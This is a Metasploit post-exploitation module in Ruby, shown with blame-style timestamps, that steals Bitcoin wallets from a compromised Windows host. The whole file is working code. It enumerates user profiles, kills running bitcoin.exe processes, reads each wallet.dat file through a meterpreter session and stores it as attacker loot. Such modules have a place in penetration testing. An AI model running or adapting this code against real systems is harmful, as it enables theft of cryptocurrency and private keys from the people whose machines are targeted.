2011-06-21 03:26:07 +00:00
|
|
|
##
|
2013-10-15 18:50:46 +00:00
|
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2011-06-21 03:26:07 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'rex'
|
2012-10-23 18:24:05 +00:00
|
|
|
require 'msf/core/auxiliary/report'
|
2011-06-21 03:26:07 +00:00
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
2013-07-03 16:30:05 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Auxiliary::Report
|
|
|
|
include Msf::Post::Windows::UserProfiles
|
|
|
|
include Msf::Post::File
|
2011-06-21 03:26:07 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info={})
|
|
|
|
super( update_info( info,
|
|
|
|
'Name' => 'Windows Gather Bitcoin wallet.dat',
|
|
|
|
'Description' => %q{
|
|
|
|
This module downloads any Bitcoin wallet.dat files from the target system
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => [ 'illwill <illwill[at]illmob.org>'],
|
|
|
|
'Platform' => [ 'win' ],
|
|
|
|
'SessionTypes' => [ 'meterpreter' ]
|
|
|
|
))
|
|
|
|
end
|
2011-06-21 03:26:07 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def run
|
|
|
|
print_status("Checking All Users For Bitcoin Wallet...")
|
|
|
|
grab_user_profiles().each do |user|
|
|
|
|
next if user['AppData'] == nil
|
|
|
|
tmpath= user['AppData'] + "\\Bitcoin\\wallet.dat"
|
|
|
|
jack_wallet(tmpath)
|
|
|
|
end
|
|
|
|
end
|
2011-06-21 03:26:07 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def jack_wallet(filename)
|
|
|
|
data = ""
|
|
|
|
return if not file?(filename)
|
2011-11-06 22:02:26 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
print_status("Wallet Found At #{filename}")
|
|
|
|
print_status(" Jackin their wallet...")
|
2011-11-06 22:02:26 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
kill_bitcoin
|
2011-11-06 22:02:26 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
begin
|
|
|
|
data = read_file(filename) || ''
|
|
|
|
rescue ::Exception => e
|
|
|
|
print_error("Failed to download #{filename}: #{e.class} #{e}")
|
|
|
|
return
|
|
|
|
end
|
2013-07-03 16:30:05 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
if data.empty?
|
|
|
|
print_error(" No data found")
|
|
|
|
else
|
|
|
|
p = store_loot(
|
|
|
|
"bitcoin.wallet",
|
|
|
|
"application/octet-stream",
|
|
|
|
session,
|
|
|
|
data,
|
|
|
|
filename,
|
|
|
|
"Bitcoin Wallet"
|
|
|
|
)
|
|
|
|
print_status(" Wallet Jacked: #{p.to_s}")
|
|
|
|
end
|
|
|
|
end
|
2011-06-21 03:26:07 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def kill_bitcoin
|
|
|
|
client.sys.process.get_processes().each do |x|
|
|
|
|
if x['name'].downcase == "bitcoin.exe"
|
|
|
|
print_status(" #{x['name']} Process Found...")
|
|
|
|
print_status(" Killing Process ID #{x['pid']}...")
|
|
|
|
session.sys.process.kill(x['pid']) rescue nil
|
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
2011-06-21 03:26:07 +00:00
|
|
|
|
|
|
|
end
|